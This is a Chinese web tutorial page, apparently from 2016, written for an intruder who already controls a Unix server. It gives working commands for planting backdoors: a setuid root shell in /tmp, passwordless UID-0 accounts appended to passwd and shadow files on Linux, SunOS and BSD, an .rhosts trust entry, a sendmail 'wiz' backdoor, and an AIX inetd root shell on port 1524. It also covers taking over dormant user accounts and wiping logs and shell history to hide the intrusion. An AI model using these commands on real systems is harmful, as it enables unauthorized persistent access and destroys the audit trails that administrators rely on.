系统后门手法和日志的擦除_漏洞研究教程-查字典教程网
系统后门手法和日志的擦除
系统后门手法和日志的擦除
发布时间:2016-12-26 来源:查字典编辑
摘要:好不容易搞了台服务器很不容易,如果被发现了就没了!可惜啊!其实,开后门的方法有很多种1.setuid#cp/bin/sh/tmp/.sh#c...

好不容易搞了台服务器很不容易,如果被发现了就没了!可惜啊!

其实,开后门的方法有很多种

1.setuid

#cp/bin/sh/tmp/.sh

#chmodu+s/tmp/.sh

加上suid位到shell上,虽然很简单,但容易被发现

2.echo"hack::0:0::/:/bin/csh">>/etc/passwd

即给系统增加一个id为0(root)的帐号,无口令。

但管理员很快就可以发现哦!

3.echo"++">>/.rhosts

如果这个系统开了512,513的port呵呵,就可以

把一个名为hack加到.rhosts文件中,rlogin登陆,无要密码!

4.修改sendmail.cf文件增加一个"wiz"命令;

然后telnetwww.xxx.com25后,wiz。。。。ok

5。改已有用户密码

如果主机上有好多用户,当你看到一个用户好久没登入了,就可以改他的密码

#passwd可用passwd命令。

6.rootkit后门包

网上有好多地方下载,找找,自己试试看,我也在测试中!不会啊!!!!

-Bsd后门:

echolove::92:206::0:0::/:/bin/sh>>/etc/master.passwd

/usr/sbin/pwd_mkdb/etc/master.passwd

这里我添加一个love的用户用户的ID是92;ROOT的是0哦!

好了我们添加一个用户了!那么权限不够怎么办呢?

cp/bin/sh/tmp/.x(这个x就是随便选个,好像.sh,.a,.b等等)

chmod777/tmp/.x

chmod+s/tmp/.x

用这个给他做个小后门吧

以后我们登陆的这台肉鸡以后就可以用tmp/.x来提升权限了。

-AIX后门(Kelvinzhou教我的,感谢你)

echo"ingreslockstreamtcpnowaitroot/bin/sh">>/tmp/.x

/usr/sbin/inetd-s/tmp/.x

rm/tmp/.x

这样你就可以telnetip1524直接得到rootshell

-SunOs后门

echo"love::0:0::/:/bin/bash">>/etc/passwd

echo"love::::::::">>/etc/shadow

当你以telnet上时,你就是root了!不过不保险!

-Linux后门

echo"love::0:0::/:/bin/bash">>/etc/passwd

echo"love::::::::">>/etc/shadow

有时间的话,就多留几个后门!

留了后门就要擦你的PP了,不是吧,这也忘了!

Unix系统日志文件通常是存放在"/var/logand/var/adm"目录下的。通常我们可以查看syslog.conf来看看日志配置的情况.如:cat/etc/syslog.conf

一般我们要清除的日志有

lastlog

utmp

wtmp

messages

syslog

sulog

此外,各种shell还会记录用户使用的命令历史,它使用用户主目录下的文件来记录这些命令历史,通常这个文件的名字为.sh_history(ksh),.history(csh),或.bash_history(bash)等。

如果你有像wipe.c那样的清日志的程序,就可以让它来做,不然的话就要手动了!建议不要用rm掉日志,最好是,把日志改编,

比如:

#cat>/usr/log/lastlog

->这里是你要的写的东西,也可以不输入哦!

^d->这里的^d是按键ctrl+d!结束!

#

好了不说了,要学的还好多,我也很菜!see!

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新漏洞研究学习
    热门漏洞研究学习
    实用技巧子分类